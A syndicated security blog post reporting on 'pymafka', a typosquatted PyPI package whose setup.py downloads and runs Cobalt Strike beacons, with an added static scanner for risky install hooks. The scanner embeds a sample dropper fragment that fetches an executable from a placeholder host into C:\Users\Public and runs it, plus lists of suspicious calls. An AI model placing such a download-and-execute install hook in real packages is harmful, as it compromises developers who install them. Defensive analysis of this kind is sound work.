
New ‘pymafka’ malicious package drops Cobalt Strike on macOS, Windows, Linux

This week, Sonatype’s automated malware detection bots have discovered malicious Python package ‘pymafka’ in the PyPI registry.

The package appears to typosquat a legitimate popular library PyKafka, a programmer-friendly Apache Kafka client for Python. The development follows our discovery of another typosquat targeting the Apache Kafka project from earlier this month.

PyKafka includes Python implementations of Kafka producers and consumers, and has been retrieved over 4,240,305 times by user-initiated downloads and mirrors/bots alike. By contrast, the malicious ‘pymafka’ shows a download count of around 300, as Sonatype promptly reported the finding to PyPI.

PyMafka drops Cobalt Strike on Windows, macOS 

On May 17th, a mysterious ‘pymafka’ package appeared on the PyPI registry. The package was promptly flagged by the Sonatype Nexus platform’s automated malware detection capabilities.

The package, ‘pymafka’ may sound identical to the popular PyKafka, but its insides reveal a different story. 

The ‘setup.py’ Python script inside ‘pymafka’ first detects your platform. Depending on whether you are running Windows, macOS, or Linux, an appropriate malicious trojan is downloaded and executed on the infected system.

The trojan in question is a Cobalt Strike (CS) beacon. Cobalt Strike is a pen-testing software tool typically used by red teams and ethical hackers for simulating real-world cyberattacks, especially during security assessments.

But time and time again, attackers, including ransomware groups like LockBit, have abused Cobalt Strike to infect victims.

Interestingly, as evident from the code below, on Windows systems the Python script attempts to drop the Cobalt Strike beacon at ‘C:\Users\Public\iexplorer.exe’. Note that this misspelling stands out: the legitimate Microsoft Internet Explorer process is typically called “iexplore.exe” (no ‘r’ at the end) and isn’t present in the C:\Users\Public directory.
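As an added example (not Sonatype’s code), the kind of static check a defender can run over a package’s setup.py before installing it: it parses the file with Python’s ast module and flags the install-time indicators described above (platform branching, a remote fetch, process execution, and a drop path under C:\Users\Public). The setup.py fragment is constructed for this example with a placeholder URL, and it is only parsed, never executed.

```python
import ast
import re

# Constructed setup.py fragment modelled on the behaviour described above.
# It is a string that is only parsed, never run; the URL is a placeholder.
SAMPLE_SETUP_PY = r'''
import platform, subprocess, urllib.request
from setuptools import setup

if platform.system() == "Windows":
    path = r"C:\Users\Public\iexplorer.exe"
    urllib.request.urlretrieve("http://PLACEHOLDER.invalid/win.exe", path)
    subprocess.Popen(path)
elif platform.system() == "Darwin":
    ...
setup(name="pymafka", version="1.0")
'''

NETWORK_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.startfile"}
PLATFORM_CALLS = {"platform.system", "platform.platform", "os.uname"}
PUBLIC_DROP = re.compile(r"(?i)c:\\users\\public\\")  # world-writable drop location

def dotted_name(node):
    """Return 'a.b.c' for an Attribute/Name chain such as a.b.c, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_setup_py(source):
    """Return the set of install-time indicators found in a setup.py source."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in NETWORK_CALLS:
                found.add("network_fetch")
            if name in EXEC_CALLS:
                found.add("process_exec")
            if name in PLATFORM_CALLS:
                found.add("platform_branching")
        elif isinstance(node, ast.Attribute) and dotted_name(node) == "sys.platform":
            found.add("platform_branching")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if PUBLIC_DROP.search(node.value):
                found.add("drop_in_public_dir")
    return found

def verdict(found):
    """Fetch plus execute at install time is the dropper pattern; anything else needs a look."""
    if {"network_fetch", "process_exec"} <= found:
        return "malicious-install-hook"
    return "needs-review" if found else "clean"
```

A setup.py that legitimately needs network access or subprocesses at install time is rare enough that "needs-review" is the right default; the scanner does not replace sandboxed dynamic analysis, which is what caught the real package.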

The malicious executables being downloaded are ‘win.exe’ [VirusTotal], and ‘MacOS’ [VirusTotal], with (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux